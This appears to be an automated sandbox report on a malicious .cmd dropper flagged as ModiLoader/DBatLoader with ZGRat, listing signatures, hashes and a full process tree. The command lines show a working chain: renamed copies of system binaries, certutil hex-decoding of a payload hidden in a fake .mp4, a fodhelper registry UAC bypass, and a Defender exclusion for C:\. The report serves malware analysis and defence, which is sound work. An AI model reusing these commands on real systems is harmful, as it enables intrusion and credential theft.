Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
13-05-2024 12:34
General
-
Target
doc023561361500.cmd
-
Size
3.5MB
-
MD5
dd0e66d9764dda9819678f30922aa6bd
-
SHA1
cc4937f70fc66f05c3c8d0df868a5bb82222a12c
-
SHA256
a092e4a960900082c38c3b96ba17b62efa3d8b7a558ea9964478afa459fcc1a5
-
SHA512
5279fbefb87e776e0c6cacd73610ff0ffada1f6493c01d39b5e44711cc37f1085bfa051f0e2235647f99a183b9c3bf1722dc3a0f760188b3c81b15c6de698206
-
SSDEEP
49152:uKh6qKOnA/Xl5c25Qnvo9pYPTLBOEKSKhFVq1ZDNBcKKBP78Vp+D6LWg:R
Malware Config
Signatures
-
Detect ZGRat V1 33 IoCs
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
ModiLoader Second Stage 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 26 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 5 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Libraries\gcggysoG.pifC:\Users\Public\Libraries\gcggysoG.pif3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cac0q5fr.gfi.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.2MB
MD57ab12ae02c9531b7ffb6f4fbb24ee11d
SHA139eb62487ed993b200a0f015c10833643664b7a0
SHA25696608d5d3810216c29d3e9ed53a0c004b7787da923f17922bf8af3405b85d90a
SHA512eef676cc6928653d2b098ddfee4604dab46232fce3a20e32c7a2c505356c02d66b0cf045149bb4dd0e4b132635c639ddc006d482e502714ead7a7b64df3191c9
-
C:\Users\Public\Libraries\gcggysoG.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Ping_c.mp4Filesize
2.4MB
MD54563cccfc27b4ee87597a7e6e73e7924
SHA1c5eac5e97193ce539f8b387c906abb7fc9c9488e
SHA256e0b66384d8a8da0fc7921d7bda9e6ea51abe4477009f82d27d4588c3444baea3
SHA512080f27b767139105dcc80d038a55b50413a934f4390bdc2f0271acde17b3a1e2eb90dee765de433b067b7deda9752ba5b6ab4470c12eddd4d36534dbb4b5351a
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\ger.exeFilesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows \System32\per.exeFilesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459
-
memory/1200-75-0x0000000000400000-0x0000000000536000-memory.dmpFilesize
1.2MB
-
memory/1572-45-0x00000241A0040000-0x00000241A0062000-memory.dmpFilesize
136KB
-
memory/3000-127-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-115-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-83-0x0000000031F10000-0x0000000031F6C000-memory.dmpFilesize
368KB
-
memory/3000-84-0x0000000034650000-0x0000000034BF4000-memory.dmpFilesize
5.6MB
-
memory/3000-85-0x0000000034560000-0x00000000345BA000-memory.dmpFilesize
360KB
-
memory/3000-89-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-99-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-145-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-144-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-139-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-138-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-135-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-133-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-132-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-129-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-78-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3000-125-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-123-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-121-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-119-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-117-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-81-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3000-113-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-111-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-109-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-107-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-101-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-97-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-95-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-93-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-91-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-141-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-105-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-103-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-87-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-86-0x0000000034560000-0x00000000345B5000-memory.dmpFilesize
340KB
-
memory/3000-1172-0x00000000345C0000-0x0000000034626000-memory.dmpFilesize
408KB
-
memory/3000-1173-0x0000000035B70000-0x0000000035BC0000-memory.dmpFilesize
320KB
-
memory/3000-1174-0x0000000035BC0000-0x0000000035C5C000-memory.dmpFilesize
624KB
-
memory/3000-1177-0x0000000035CE0000-0x0000000035D72000-memory.dmpFilesize
584KB
-
memory/3000-1178-0x0000000035EF0000-0x0000000035EFA000-memory.dmpFilesize
40KB